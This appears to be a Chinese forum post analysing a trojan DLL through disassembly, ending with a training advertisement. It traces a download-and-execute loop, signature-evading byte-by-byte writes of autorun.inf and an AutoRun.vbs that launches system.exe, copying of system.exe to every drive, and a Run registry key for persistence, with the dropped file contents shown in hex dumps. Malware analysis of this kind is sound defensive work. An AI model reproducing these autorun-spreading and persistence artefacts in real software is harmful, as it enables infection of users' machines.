然后再循环中调用100028f0, 得到其数据内容, 然后写入一个新文件到system32目录下.
(等把虚拟机弄上网了就仔细跟跟, 这里给出其思路)
执行代码:
下载txt;
@@:
解析出txt中的一个url
下载url;
写入新文件;
... ...
10002DE3 |. 51 |push ecx
10002DE4 |. 8B95 C0FDFFFF |mov edx, dword ptr [ebp-240]
10002DEA |. 8B42 2C |mov eax, dword ptr [edx+2C]
10002DED |. FFD0 |call eax ; kernel32.WinExec
... ...
jmp @B.
... ...
此外, 会创建一个system.exe文件并执行 .
现在, 可以明白新线程1负责下载txt下载列表文件. 创建C:\Windows\system32\system.exe文件. 并执行之.
新线程2部分跟进代码:
1000201A |. 6A 00 |push 0
1000201C |. 6A 02 |push 2
1000201E |. 6A 01 |push 1
10002020 |. 6A 00 |push 0
10002022 |. 6A 00 |push 0
10002024 |. 68 00000010 |push 10000000
10002029 |. 8D8D 58FFFFFF |lea ecx, dword ptr [ebp-A8]
1000202F |. 51 |push ecx
10002030 |. 8B95 0CFDFFFF |mov edx, dword ptr [ebp-2F4]
10002036 |. 8B82 80000000 |mov eax, dword ptr [edx+80]
1000203C |. FFD0 |call eax ; kernel32.CreateFileA
1000203E |. 8985 DCFDFFFF |mov dword ptr [ebp-224], eax
10002044 |. 83BD DCFDFFFF>|cmp dword ptr [ebp-224], -1 ; 看是否是HANDLE_INVALID_VALUE..
1000204B |. 0F84 26020000 |je 10002277
10002051 |. C685 88FDFFFF>|mov byte ptr [ebp-278], 5B
10002058 |. C685 89FDFFFF>|mov byte ptr [ebp-277], 41
1000205F |. C685 8AFDFFFF>|mov byte ptr [ebp-276], 75
10002066 |. C685 8BFDFFFF>|mov byte ptr [ebp-275], 74
1000206D |. C685 8CFDFFFF>|mov byte ptr [ebp-274], 6F
10002074 |. C685 8DFDFFFF>|mov byte ptr [ebp-273], 52
1000207B |. C685 8EFDFFFF>|mov byte ptr [ebp-272], 75
... ...
这是在创建autorun.inf. (C:\autorun.inf) . 下面的这些mov都是在动态地写autorun.inf的内容(目的:免杀,防止文件特征码查杀).
0006F5E7 00 00 00 00 00 28 F7 06 00 00 00 92 7C 5B 41 75 .....(?...抾[Au
0006F5F7 74 6F 52 75 6E 5D 0D 0A 73 68 65 6C 6C 65 78 65 toRun]..shellexe
0006F607 63 75 74 65 3D 41 75 74 6F 52 75 6E 2E 76 62 73 cute=AutoRun.vbs
0006F617 0D 0A 73 68 65 6C 6C 5C 41 75 74 6F 5C 63 6F 6D ..shell\Auto\com
0006F627 6D 61 6E 64 3D 41 75 74 6F 52 75 6E 2E 76 62 73 mand=AutoRun.vbs
0006F637 0D 0A 0D 0A 0D 0A F6 06 00 0E 44 93 7C 70 09 93 ......?.D搢p.
再后面就是创建Autorun.vbs了, 不贴反汇编了.太长.
vbs内容:
0006F57B 00 73 65 74 20 79 75 3D 77 73 63 72 69 70 74 2E .set yu=wscript.
0006F58B 63 72 65 61 74 65 6F 62 6A 65 63 74 28 22 77 73 createobject("ws
0006F59B 63 72 69 70 74 2E 73 68 65 6C 6C 22 29 0D 0A 79 cript.shell")..y
0006F5AB 75 2E 72 75 6E 20 22 63 6D 64 20 2F 63 20 73 74 u.run "cmd /c st
0006F5BB 61 72 74 20 73 79 73 74 65 6D 2E 65 78 65 22 2C art system.exe",
然后创建system.exe文件:
10002652 |. 8B82 94000000 |mov eax, dword ptr [edx+94]
10002658 |. FFD0 |call eax ; kernel32.CopyFileA
堆栈:
0006F56C 0006F9A0 ASCII "C:\WINDOWS\system32\system.exe"
0006F570 0006F744 ASCII "C:\system.exe"
这里会有个循环, 即C,D,E等盘都无法幸免 . 可以看到dll是将system32目录下的system.exe复制到C盘根目录下.
所以最初的木马肯定有个system.exe用于调用这个dll中的Export函数 .
dll从C盘开始遍历. 遇到CreateFile失败则认为所有盘遍历完毕.
在线程2中, 上面的那个call(10001CC0)是负责autorun感染的.
这是线程2的函数:
1000307A |> /B8 01000000 /mov eax, 1
1000307F |. |85C0 |test eax, eax
10003081 |. |74 34 |je short 100030B7
10003083 |. |8D8D D8FDFFFF |lea ecx, dword ptr [ebp-228]
10003089 |. |E8 32ECFFFF |call 10001CC0 ; Autorun感染。。
1000308E |. |8D8D D8FDFFFF |lea ecx, dword ptr [ebp-228]
10003094 |. |E8 97EAFFFF |call 10001B30
10003099 |. |50 |push eax
1000309A |. |B8 01000000 |mov eax, 1
1000309F |. |B8 0A000000 |mov eax, 0A
100030A4 |. |58 |pop eax
100030A5 |. |68 D0070000 |push 7D0
100030AA |. |8B8D D0FDFFFF |mov ecx, dword ptr [ebp-230]
100030B0 |. |8B51 40 |mov edx, dword ptr [ecx+40]
100030B3 |. |FFD2 |call edx
100030B5 |.^\EB C3 \jmp short 1000307A ;可以看到这里是个死循环.
...
程序使用while(1) { ... 一直创建autorun.inf 删都删不掉的. ...}
下面的这个call (10001B30)如下:
通过mov byte ptr ... 方式写入一个加密后的串, 然后再使用DecodeString函数解密串, 揭秘后的内容为如下:
0006F838 65 6D 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 em..SOFTWARE\Mic
0006F848 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 rosoft\Windows\C
0006F858 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 urrentVersion\Ru
0006F868 6E 00 66 00 A4 FA 06 00 99 30 00 10 58 1F 00 00 n.f..?.X..
后面写入注册表自启动:
... ...
10001CB9 |. FFD2 call edx ; ADVAPI32.RegSetValueExA
...
stack:
0006F814 00000218
0006F818 0006F834 ASCII "system"
0006F81C 00000000
0006F820 00000001
0006F824 0006F9A0 ASCII "C:\WINDOWS\system32\system.exe"
然后后面就是FreeLibrary等扫尾动作. 不过由于有个死循环在那. 所以dll就一直在宿主进程中.
样本见附件. 密码: pediy
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
|
|
|---|---|
|
|
